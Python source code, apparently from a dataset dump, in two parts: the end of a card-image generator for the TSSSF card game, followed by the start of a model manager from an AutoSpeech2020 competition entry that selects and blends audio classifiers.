"Rules5": PIL_Helper.LoadImage(CardPath + "BLEED_Rules5.png"),
"Goal": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Goal-bleed.png"),
"Derpy": PIL_Helper.LoadImage(CardPath + "BLEED_Card - Derpy Hooves.png"),
"TestSubject": PIL_Helper.LoadImage(CardPath + "BLEED_Card - OverlayTest Subject Cheerilee.png")
}
Symbols = {
"male": PIL_Helper.LoadImage(SymbolsPath + "Symbol-male.png"),
"female": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Female.png"),
"malefemale": PIL_Helper.LoadImage(SymbolsPath + "Symbol-MaleFemale.png"),
"earth pony": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Earth-Pony.png"),
"unicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Unicorn.png"),
"uniearth": PIL_Helper.LoadImage(SymbolsPath + "symbol-uniearth.png"),
"pegasus": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Pegasus.png"),
"alicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Alicorn.png"),
"changelingearthpony": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingEarthPony.png"),
"changelingunicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingUnicorn.png"),
"changelingpegasus": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingPegasus.png"),
"changelingalicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingAlicorn.png"),
"dystopian": PIL_Helper.LoadImage(SymbolsPath + "symbol-dystopian-future.png"),
"ship": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Ship.png"),
"goal": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Goal.png"),
"0": PIL_Helper.LoadImage(SymbolsPath + "symbol-0.png"),
"1": PIL_Helper.LoadImage(SymbolsPath + "symbol-1.png"),
"2": PIL_Helper.LoadImage(SymbolsPath + "symbol-2.png"),
"3": PIL_Helper.LoadImage(SymbolsPath + "symbol-3.png"),
"4": PIL_Helper.LoadImage(SymbolsPath + "symbol-4.png"),
"3-4": PIL_Helper.LoadImage(SymbolsPath + "symbol-34.png"),
"2-3": PIL_Helper.LoadImage(SymbolsPath + "symbol-23.png")
}
TIMELINE_SYMBOL_LIST = ["Dystopian"]
Expansions = {
"Everfree14": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Everfree14.png"),
"Indiegogo": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Indiegogo.png"),
"Birthday": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-birthday.png"),
"Bronycon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Bronycon14.png"),
"Summer": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-summer-lovin.png"),
"Apricity": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-apricity.png"),
"BronyCAN": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Bronycan14.png"),
"Xtra": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-extracredit.png"),
"Xtra-dark": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-extracredit-black.png"),
"NMND": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-nightmarenights.png"),
"Ciderfest": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-ponyvilleciderfest.png"),
"Adventure": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-adventure.png"),
"Custom": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-custom.png"),
"Power": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-power.png"),
"Multiplicity": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-multiplicity.png"),
"Canon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-canon.png"),
"Dungeon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-dungeon.png"),
"50": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-50.png"),
"2014": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-2014.png"),
"Hearthswarming": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-hearthswarming.png"),
"Ponycon 2015": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-ponynyc.png"),
"Patreon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Patreon.png"),
"Gameshow": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-gameshow.png"),
"BABScon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-BABScon.png")
}
ColorDict = {
"START": (58, 50, 53),
"START bar text": (237, 239, 239),
"START flavor": (28, 20, 23),
"Pony": (70, 44, 137),
"Pony bar text": (234, 220, 236),
"Pony flavor": (25, 2, 51),
"Goal": (18, 57, 98),
"Goal flavor": (7, 34, 62),
"Shipwrecker": (8, 57, 98),
"Shipwrecker flavor": (0, 34, 62),
"Ship": (206, 27, 105),
"Ship bar text": (234, 220, 236),
"Ship flavor": (137, 22, 47),
"Copyright": (255, 255, 255),
"Blankfill": (200, 200, 200)
}
RulesDict = {
"{replace}": "While this card is in your hand, you may discard a Pony card from the grid and play this card in its place. This power cannot be copied.",
"{swap}": "You may swap 2 Pony cards on the shipping grid.",
"{3swap}": "You may swap up to 3 Pony cards on the grid.",
"{draw}": "You may draw 1 card from the Ship or Pony deck.",
"{goal}": "You may discard 1 active Goal and draw 1 new Goal to replace it.",
"{search}": "You may search the Ship or Pony discard pile for 1 card of your choice and put it into your hand. If it's still in your hand at the end of your turn, discard it.",
"{copy}": "You may copy the power of any Pony card currently on the shipping grid, except for Pony cards with the Changeling keyword.",
"{hermaphrodite}": "May count as either {male} or {female} for all Goals, Ships, and powers.",
"{double pony}": "This card counts as 2 Ponies.",
"{love poison}": "Instead of playing this Ship with a Pony card from your hand, or connecting two Pony cards already on the shipping grid, you may take a Pony card from the grid and reattach it elsewhere with this Ship. That card's power activates.",
"{keyword change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card gains one keyword of your choice, except for Pony names.",
"{gender change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card becomes the opposite gender.",
"{race change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card becomes the race of your choice. This cannot affect Pony cards with the Changeling keyword.",
"{timeline change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card's timeline becomes {postapocalypse}.",
"{play from discard}": "You may choose to play the top card of the Pony discard pile with this Ship, rather than play a Pony card from your hand.",
"{clone}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card counts as 2 Ponies.",
}
backs = {
"START": PIL_Helper.LoadImage(CardBacksPath + "Back-Start.png"),
"Pony": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Goal": PIL_Helper.LoadImage(CardBacksPath + "Back-Goals.png"),
"Ship": PIL_Helper.LoadImage(CardBacksPath + "Back-Ships.png"),
"Card": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Shipwrecker": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"BLANK": PIL_Helper.LoadImage(CardBacksPath + "Blank - Intentionally Left Blank.png"),
"Rules1": PIL_Helper.LoadImage(CardPath + "Rules2.png"),
"Rules3": PIL_Helper.LoadImage(CardPath + "Rules4.png"),
"Rules5": PIL_Helper.LoadImage(CardPath + "Rules6.png"),
"TestSubject": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Warning": PIL_Helper.LoadImage(CardPath + "Card - Contact.png")
}
special_card_types = ["Rules1", "Rules3", "Rules5", "Warning", "Derpy", "Card"]
special_cards_with_copyright = ["Derpy"]
def FixFileName(tagin):
FileName = tagin.replace("\n", "")
invalid_chars = [",", "?", '"', ":"]
for c in invalid_chars:
FileName = FileName.replace(c, "")
FileName = u"{0}.png".format(FileName)
return FileName
def FixUnicode(text):
    # Convert escaped "\n" sequences and symbol placeholders (e.g. {male},
    # {ship}) into the special glyph codepoints used when rendering card text.
text = text.replace(r'\n', '\n')
if LegacySymbolMode:
text = text.replace(';', u"\u2642")
text = text.replace('*', u"\u2640")
text = text.replace('>', u"\u26A4")
text = text.replace('<', u"\u2764")
text = text.replace('%', u"\uE000")
text = text.replace('8', u"\uE001")
text = text.replace('9', u"\uE002")
text = text.replace('@', u"\uE003")
text = text.replace('$', u"\uE004")
else:
text = text.replace('{male}', u"\u2642")
text = text.replace('{female}', u"\u2640")
text = text.replace('{malefemale}', u"\u26A4")
text = text.replace('{ship}', u"\u2764")
text = text.replace('{earthpony}', u"\uE000")
text = text.replace('{unicorn}', u"\uE001")
text = text.replace('{pegasus}', u"\uE002")
text = text.replace('{alicorn}', u"\uE003")
text = text.replace('{postapocalypse}', u"\uE004")
return text
def SaveCard(filepath, image_to_save):
'''
If the filepath already exists, insert _001 just before the
extension. If that exists, increment the number until we get to
a filepath that doesn't exist yet.
'''
if os.path.exists(filepath):
basepath, extension = os.path.splitext(filepath)
i = 0
while os.path.exists(filepath):
i += 1
filepath = "{}_{:>03}{}".format(basepath, i, extension)
image_to_save.save(filepath, dpi=(300, 300))
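# Illustrative sketch, not part of the original file: shows SaveCard's
# numbering behaviour. The output filename below is an assumed example.
def _example_savecard_naming(image):
    SaveCard(CropPath + "Pony_Example.png", image)  # writes Pony_Example.png
    SaveCard(CropPath + "Pony_Example.png", image)  # writes Pony_Example_001.png instead of overwriting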
def BuildCard(data):
    # Render one card from either a dict (JSON-style card) or a
    # backtick-delimited string (PON-style card); save bleed, cropped and
    # Vassal-sized copies when the card has a picture, and return the cropped
    # image (a blank card is returned if rendering fails).
picture = None
title = None
if type(data).__name__ == 'dict':
card = data
card_type = data['type']
picture = data.get('picture', None)
title = data.get('title', None)
else:
card = data.strip('\n').strip('\r').replace(r'\n', '\n').split('`')
card_type = card[TYPE]
if len(card) >= 2:
picture = card[PICTURE]
        if len(card) > TITLE:
title = card[TITLE]
try:
im = PickCardFunc(card_type, card)
if picture is not None:
if title is not None:
filename = FixFileName(card_type + "_" + title)
else:
filename = FixFileName(card_type + "_" + picture)
SaveCard(os.path.join(BleedsPath, filename), im)
im_crop = im.crop(croprect)
SaveCard(os.path.join(CropPath, filename), im_crop)
im_vassal = PIL_Helper.ResizeImage(im_crop, VASSAL_SCALE)
SaveCard(os.path.join(VassalPath, filename), im_vassal)
else:
im_crop = im.crop(croprect)
except Exception as e:
print "Warning, Bad Card: {0}".format(data)
traceback.print_exc()
im_crop = MakeBlankCard().crop(croprect)
return im_crop
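# Illustrative sketch, not part of the original file: a hypothetical
# backtick-delimited (PON-style) card line, with fields in the order given by
# TYPE, PICTURE, SYMBOLS, TITLE, KEYWORDS, BODY, FLAVOR, EXPANSION above.
# The card name, art filename and text are invented for demonstration only.
_EXAMPLE_PON_CARD = "Pony`ExamplePony.png`Female!Pegasus`Example Pony`Pegasus, Example`{draw}`An example flavor line.`Custom"
def _example_build_card():
    # Renders the example card (missing art falls back to an ArtMissing image)
    # and returns the cropped card image.
    return BuildCard(_EXAMPLE_PON_CARD)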
def BuildBack(data):
if type(data).__name__ == 'dict':
card_type = data['type']
else:
card = data.strip('\n').strip('\r').replace(r'\n', '\n').split('`')
card_type = card[TYPE]
return backs[card_type]
def PickCardFunc(card_type, data):
if card_type == "START":
return MakeStartCard(data)
elif card_type == "Pony":
return MakePonyCard(data)
elif card_type == "Ship":
return MakeShipCard(data)
elif card_type == "Goal":
return MakeGoalCard(data)
elif card_type == "BLANK":
return MakeBlankCard()
elif card_type == "TestSubject":
return MakePonyCard(data)
elif card_type in special_card_types:
return MakeSpecialCard(data)
else:
raise Exception("No card of type {0}".format(card_type))
def GetFrame(card_type):
return Frames[card_type].copy()
def AddCardArt(image, filename, anchor):
if filename == "NOART":
return
if os.path.exists(os.path.join(CardPath, filename)):
art = PIL_Helper.LoadImage(os.path.join(CardPath, filename))
else:
art = random.choice(ArtMissing)
# Find desired height of image based on width of 600 px
w, h = art.size
h = int((float(ART_WIDTH) / w) * h)
# Resize image to fit in frame
art = PIL_Helper.ResizeImage(art, (ART_WIDTH, h))
image.paste(art, anchor)
def AddSymbols(image, symbols, card_type=""):
# Remove any timeline symbols from the symbols list
pruned_symbols = set(symbols) - set(TIMELINE_SYMBOL_LIST)
if card_type == "Goal":
positions = [Anchors["LoneSymbol"], Anchors["GoalSymbol2"]]
else:
# If there's only one non-timeline symbol in the list,
# Set it right on the corner of the picture.
# Otherwise, adjust so the symbols share the space
if len(pruned_symbols) == 1:
positions = [Anchors["LoneSymbol"]]
else:
positions = [Anchors["Symbol1"], Anchors["Symbol2"]]
for index, s in enumerate(symbols):
sym = Symbols.get(s.lower(), None)
if sym:
if s in TIMELINE_SYMBOL_LIST:
image.paste(sym, Anchors["TimelineSymbol"], sym)
else:
image.paste(sym, positions[index], sym)
def TitleText(image, text, color):
font = fonts["Title"]
anchor = Anchors["Title"]
leading = -9
if text.count('\n') > 0:
anchor = Anchors["TitleTwoLine"]
leading = -15
if len(text) > TitleWidthThresholds[0]:
anchor = Anchors["TitleSmall"]
font = fonts["TitleSmall"]
print repr(text)
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=anchor,
valign="center",
halign="right",
leading_offset=leading
)
def BarText(image, text, color):
bar_text_size = PIL_Helper.GetTextBlockSize(text, fonts["Bar"], textmaxwidth)
if bar_text_size[0] > BarTextThreshold[0]:
font = fonts["BarSmall"]
else:
font = fonts["Bar"]
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=Anchors["Bar"],
halign="right"
)
def BodyText(image, text, color, flavor_text_size=0, font=None):
# Replacement of keywords with symbols
for keyword in RulesDict:
if keyword in text:
text = text.replace(keyword, RulesDict[keyword])
text = FixUnicode(text)
if font is None:
font = fonts["Body"]
anchor = Anchors["Body"]
leading = -1
# Get the size of the body text as (w,h)
body_text_size = PIL_Helper.GetTextBlockSize(
text, fonts["Body"], textmaxwidth
)
# If the height of the body text plus the height of the flavor text
# doesn't fit in on the card in the normal position, move the body text up
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[0]:
anchor = Anchors["BodyShiftedUp"]
# If they still don't fit, makes the body text smaller
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[1]:
font = fonts["BodySmall"]
body_text_size = PIL_Helper.GetTextBlockSize(
text, font, textmaxwidth
)
# If they still don't fit, make it smaller again. They're probably
# the changeling cards
if body_text_size[1] + flavor_text_size[1] > TextHeightThresholds[1]:
font = fonts["BodyChangeling"]
leading = -3
Anchors["BodyShiftedUp"]
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=anchor,
halign="center",
max_width=textmaxwidth,
leading_offset=leading
)
def FlavorText(image, text, color):
return PIL_Helper.AddText(
image=image,
text=text,
font=fonts["Flavortext"],
fill=color,
anchor=Anchors["Flavor"],
valign="bottom",
halign="center",
leading_offset=+1,
max_width=textmaxwidth,
padline=True,
)
def GetExpansionIcon(expansion):
return PIL_Helper.LoadImage(ExpansionIconsPath + expansion)
def AddExpansion(image, expansion):
expansion_symbol = Expansions.get(expansion, None)
if expansion_symbol:
image.paste(expansion_symbol, Anchors["Expansion"], expansion_symbol)
def AddExpansionJSON(image, expansion_symbol):
if expansion_symbol:
image.paste(expansion_symbol, Anchors["Expansion"], expansion_symbol)
def CopyrightText(card, image, color, artist):
card_set = CardSet.replace('_', ' ')
client = None
if type(card).__name__ == 'dict':
client = card.get('client')
else:
if len(card) - 1 >= CLIENT:
client = str(card[CLIENT])
if client is not None:
card_set += " " + client
text = "{}; TSSSF by Horrible People Games. Art by {}.".format(
card_set,
artist
)
PIL_Helper.AddText(
image=image,
text=text,
font=fonts["Copyright"],
fill=color,
anchor=Anchors["Copyright"],
valign="bottom",
halign="right",
)
def MakeBlankCard():
image = PIL_Helper.BlankImage(base_w, base_h)
PIL_Helper.AddText(
image=image,
text="This Card Intentionally Left Blank",
font=fonts["Title"],
fill=ColorDict["Blankfill"],
anchor=Anchors["Blank"],
max_width=textmaxwidth
)
return image
def MakeStartCard(card):
if type(card).__name__ == 'dict':
return MakeStartCardJSON(card)
else:
return MakeStartCardPON(card)
def MakeStartCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["PonyArt"])
TitleText(image, data['title'], ColorDict["START"])
AddSymbols(image, data.get('symbols', []))
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["START bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["START flavor"])
BodyText(image, data.get('body', ''), ColorDict["START"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeStartCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["PonyArt"])
TitleText(image, tags[TITLE], ColorDict["START"])
AddSymbols(image, tags[SYMBOLS].split('!'))
BarText(image, tags[KEYWORDS], ColorDict["START bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["START flavor"])
BodyText(image, tags[BODY], ColorDict["START"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakePonyCard(card):
if type(card).__name__ == 'dict':
return MakePonyCardJSON(card)
else:
return MakePonyCardPON(card)
def MakePonyCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["PonyArt"])
TitleText(image, data['title'], ColorDict["Pony"])
AddSymbols(image, data.get('symbols', []))
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["Pony bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Pony flavor"])
BodyText(image, data.get('body', ''), ColorDict["Pony"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakePonyCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["PonyArt"])
TitleText(image, tags[TITLE], ColorDict["Pony"])
AddSymbols(image, tags[SYMBOLS].split('!'))
BarText(image, tags[KEYWORDS], ColorDict["Pony bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Pony flavor"])
BodyText(image, tags[BODY], ColorDict["Pony"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeShipCard(card):
if type(card).__name__ == 'dict':
return MakeShipCardJSON(card)
else:
return MakeShipCardPON(card)
def MakeShipCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["ShipArt"])
TitleText(image, data['title'], ColorDict["Ship"])
AddSymbols(image, data.get('symbols', []), "Ship")
BarText(image, ', '.join(data.get('keywords', [])), ColorDict["Ship bar text"])
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Ship flavor"])
BodyText(image, data.get('body', ''), ColorDict["Ship"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeShipCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["ShipArt"])
TitleText(image, tags[TITLE], ColorDict["Ship"])
AddSymbols(image, tags[SYMBOLS].split('!'), "Ship")
BarText(image, tags[KEYWORDS], ColorDict["Ship bar text"])
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Ship flavor"])
BodyText(image, tags[BODY], ColorDict["Ship"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeGoalCard(card):
if type(card).__name__ == 'dict':
return MakeGoalCardJSON(card)
else:
return MakeGoalCardPON(card)
def MakeGoalCardJSON(data):
image = GetFrame(data['type'])
AddCardArt(image, data['picture'], Anchors["GoalArt"])
TitleText(image, data['title'], ColorDict["Goal"])
AddSymbols(image, data.get('symbols', []), card_type="Goal")
text_size = FlavorText(image, data.get('flavor', ''), ColorDict["Goal flavor"])
BodyText(image, data.get('body', ''), ColorDict["Goal"], text_size)
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeGoalCardPON(tags):
image = GetFrame(tags[TYPE])
AddCardArt(image, tags[PICTURE], Anchors["GoalArt"])
TitleText(image, tags[TITLE], ColorDict["Goal"])
AddSymbols(image, tags[SYMBOLS].split('!'), card_type="Goal")
text_size = FlavorText(image, tags[FLAVOR], ColorDict["Goal flavor"])
BodyText(image, tags[BODY], ColorDict["Goal"], text_size)
CopyrightText(tags, image, ColorDict["Copyright"], ARTIST)
if len(tags) > EXPANSION:
AddExpansion(image, tags[EXPANSION])
return image
def MakeSpecialCard(card):
if type(card).__name__ == 'dict':
return MakeSpecialCardJSON(card)
else:
return MakeSpecialCardPON(card)
def MakeSpecialCardJSON(data):
print repr(data['picture'])
image = GetFrame(data['picture'])
if data['picture'] in special_cards_with_copyright:
CopyrightText(data, image, ColorDict["Copyright"], data.get('artist', ARTIST))
if Expansion_Icon is not None:
AddExpansionJSON(image, Expansion_Icon)
return image
def MakeSpecialCardPON(data):
print repr(data[PICTURE])
image = GetFrame(data[PICTURE])
if data[PICTURE] in special_cards_with_copyright:
CopyrightText(data, image, ColorDict["Copyright"], ARTIST)
if len(data) > EXPANSION:
AddExpansion(image, data[EXPANSION])
return image
def InitVassalModule():
pass
def MakeVassalCard(im):
VassalCard[0] += 1
im.save(VassalImagesPath + "/" + str(VassalCard[0]) + ".png")
def CompileVassalModule():
pass
if __name__ == "__main__":
print "Not a main module. Run GameGen.py"
| 38.954802 | 254 | 0.660334 |
4a1e4517221b3683f57f42f71b6525a011c60093 | 15,748 | py | Python | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | 4 | 2020-05-19T03:48:35.000Z | 2020-08-21T00:56:53.000Z | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | null | null | null | mysubmission/model_manager.py | 279632990/AutoSpeech2020 | 0b4c035dac937638c18dd34d842b18f6534b2bab | [
"Apache-2.0"
] | 1 | 2020-06-02T11:57:35.000Z | 2020-06-02T11:57:35.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by HazzaCheng on 2019-09-22
import gc
import numpy as np
from sklearn.metrics import roc_auc_score, accuracy_score
from tensorflow.python.keras import backend as K
from CONSTANT import CLASS_NUM, MODEL_FIRST_MAX_RUN_LOOP, FIRST_ROUND_DURATION, SECOND_ROUND_DURATION
from models import * # import all models and model_name constant
from models.crnn2d import Crnn2dModel
from models.crnn2d_larger import Crnn2dLargerModel
from models.crnn2d_vgg import Crnn2dVggModel
from models.my_classifier import Classifier
from models.cnn import CnnModel2D
from tools import log
def auc_metric(solution, prediction):
if solution.sum(axis=0).min() == 0:
return np.nan
auc = roc_auc_score(solution, prediction, average='macro')
return np.mean(auc * 2 - 1)
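# Illustrative check, not part of the original module: auc_metric rescales the
# macro AUC from [0, 1] to [-1, 1] (a Gini-style score), so a perfect ranking
# scores 1.0 and a random one roughly 0.0. The toy arrays are invented.
def _example_auc_metric():
    solution = np.array([[1, 0], [0, 1], [1, 0]])
    prediction = np.array([[0.9, 0.1], [0.2, 0.8], [0.7, 0.3]])
    return auc_metric(solution, prediction)  # 1.0 for this perfectly ranked toy case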
def acc_metric(solution, prediction):
if solution.sum(axis=0).min() == 0:
return np.nan
acc = accuracy_score(solution, prediction)
return acc
class ModelManager(Classifier):
def __init__(self,
meta,
data_manager,
keep_num=5,
each_model_keep_num=3,
each_model_top_k=2,
patience=3,
auc_threshold=0.5,
*args,
**kwargs):
self.metadata = meta
self._data_manager = data_manager
self._keep_num = keep_num
self._each_model_keep_num = each_model_keep_num
self._each_model_top_k = each_model_top_k
self._patience = patience
self._not_rise_num = 0
self._input_shape = None
self._model = None
self._model_name = None
self._last_model_name = None
self._cur_model_run_loop = 0
self._model_num = 0
self._model_idx = 0
self._round_num = 0
self._val_set = None
self._test_x = None
self._use_new_train = False
self._is_reset_model = False
self._use_mfcc = True
self._is_nedd_30s = False
self._use_mel_round = None
self._k_best_predicts = [-1] * self._keep_num
self._k_best_auc = [-1.1] * self._keep_num
self._each_model_best_predict = {}
self._each_model_best_auc = {}
self._cur_model_max_auc = -1
self._auc_threshold = auc_threshold
self._num_classes = self.metadata[CLASS_NUM]
self._model_lib = {
LR_MODEL: LogisticRegression,
LSTM_MODEL: LstmAttention,
CRNN_MODEL: CrnnModel,
CRNN2D_MODEL: Crnn2dModel,
CRNN2D_LARGER_MODEL: Crnn2dLargerModel,
CRNN2D_VGG_MODEL: Crnn2dVggModel,
BILSTM_MODEL: BilstmAttention,
CNN_MODEL_2D: CnnModel2D,
SVM_MODEL: SvmModel,
ATTGRU: AttentionGru
}
self._model_sequences = [
LR_MODEL,
CRNN_MODEL,
#CNN_MODEL_2D,
BILSTM_MODEL,
LSTM_MODEL
]
self._max_first_model_run_loop = MODEL_FIRST_MAX_RUN_LOOP
self._max_model_run_loop = 12
self._models = {}
def _get_or_create_model(self):
# use new model and not reset model, have to initialize the model
if not self._model.is_init:
log(f'get new model {self._model_name}')
# init model parameters
if self._model_name == CNN_MODEL_2D:
kwargs = {
'input_shape': self._input_shape[1:],
'num_classes': self.metadata[CLASS_NUM],
'max_layer_num': 10
}
elif self._model_name in [LSTM_MODEL, BILSTM_MODEL, CRNN_MODEL, CRNN2D_MODEL, CRNN2D_LARGER_MODEL,
CRNN2D_VGG_MODEL, ATTGRU]:
kwargs = {
'input_shape': self._input_shape[1:],
'num_classes': self.metadata[CLASS_NUM],
}
elif self._model_name == SVM_MODEL:
kwargs = {
'kernel': 'linear',
'max_iter': 1000
}
elif self._model_name == LR_MODEL:
kwargs = {
'kernel': 'liblinear',
'max_iter': 100
}
else:
raise Exception("No such model!")
if not self._model.is_init:
self._model.init_model(**kwargs)
log(f'This train loop use {self._model_name}, last train loop use {self._last_model_name}')
def _pre_select_model(self, train_loop_num):
self._last_model_name = self._model_name
if train_loop_num == 1 or self._model_name is None:
self._model_name = self._model_sequences[0]
self._each_model_best_auc[self._model_name] = [-1]
self._each_model_best_predict[self._model_name] = [-1]
self._use_new_train = True
if self._not_rise_num == self._patience \
or (self._model_num == 0 and self._cur_model_run_loop >= self._max_first_model_run_loop) \
or (self._round_num == 0 and self._cur_model_run_loop >= self._max_model_run_loop):
self._model_idx += 1
if self._model_idx == len(
self._model_sequences) and LR_MODEL in self._model_sequences:
# TODO be careful!
self._model_idx = 1
self._round_num += 1
if self._round_num > 1:
self._patience = 4
# sort model sequences by auc, desc
if not self._data_manager.crnn_first:
self._model_sequences = [self._model_sequences[0]] \
+ sorted(self._model_sequences[1:],
key=lambda x: self._each_model_best_auc[x][-1], reverse=True)
else:
self._model_sequences.remove(CRNN_MODEL)
self._model_sequences = [self._model_sequences[0]] + [CRNN_MODEL] \
+ sorted(self._model_sequences[1:],
key=lambda x: self._each_model_best_auc[x][-1], reverse=True)
log(
f'round {self._round_num} start, model sequences {self._model_sequences[self._model_idx:]}')
self._model_name = self._model_sequences[self._model_idx]
self._model_num += 1
self._not_rise_num = 0
log(
f'change model from {self._last_model_name} to {self._model_name}, loop_num: {self._cur_model_run_loop}')
self._use_new_train = self._model_num in [0,
1,
(2 * (len(self._model_sequences) - 1)) + 1,
(3 * (len(self._model_sequences) - 1)) + 1,
(4 * (len(self._model_sequences) - 1)) + 1]
self._is_reset_model = (self._round_num > 1
and self._model_num == self._round_num * (len(self._model_sequences) - 1) + 1)
if self._use_new_train:
self._test_x = None
self._cur_model_run_loop = 0
if self._round_num == 0 and self._cur_model_run_loop == 0:
self._each_model_best_auc[self._model_name] = [-1]
self._each_model_best_predict[self._model_name] = [-1]
self._cur_model_max_auc = -1
elif self._round_num == 1 and self._cur_model_run_loop == 0:
self._cur_model_max_auc = self._each_model_best_auc[self._model_name][-1]
elif self._round_num >= 2 and self._cur_model_run_loop == 0:
self._each_model_best_auc[self._model_name] += [-1]
self._each_model_best_predict[self._model_name] += [-1]
self._cur_model_max_auc = -1
if self._is_reset_model:
log(f'new round {self._round_num}')
# clear all models
self._models.clear()
del self._model
self._model = None
gc.collect()
K.clear_session()
# self._new_round = False
if self._model_name != self._last_model_name or self._model is None or self._is_reset_model:
if self._model_name in self._models:
self._model = self._models[self._model_name]
else:
self._model = self._model_lib[self._model_name]()
self._models[self._model_name] = self._model
def _get_each_model_top_k_predicts(self):
predicts = []
for k, v in self._each_model_best_auc.items():
if k == LR_MODEL:
continue
k_predicts = np.asarray(self._each_model_best_predict[k])
temp = [(auc, k_predicts[i]) for i, auc in enumerate(v)
if auc > max(self._auc_threshold, self._k_best_auc[0] - 0.1)]
temp.sort(key=lambda x: x[0], reverse=True)
predicts.extend(temp[:self._each_model_top_k])
if len(predicts) == 0:
return [], []
predicts = sorted(predicts, key=lambda x: x[0], reverse=True)[
:self._each_model_keep_num]
top_k_aucs = [predicts[i][0] for i in range(len(predicts))]
top_k_predicts = [predicts[i][1] for i in range(len(predicts))]
return top_k_aucs, top_k_predicts
def _blending_ensemble(self):
selected_k_best = [self._k_best_predicts[i]
for i, a in enumerate(self._k_best_auc) if a > 0.0]
each_model_k_aucs, selected_each_model_k_best = self._get_each_model_top_k_predicts()
if self._round_num >= 2:
selected = selected_k_best + selected_each_model_k_best
else:
selected = selected_k_best
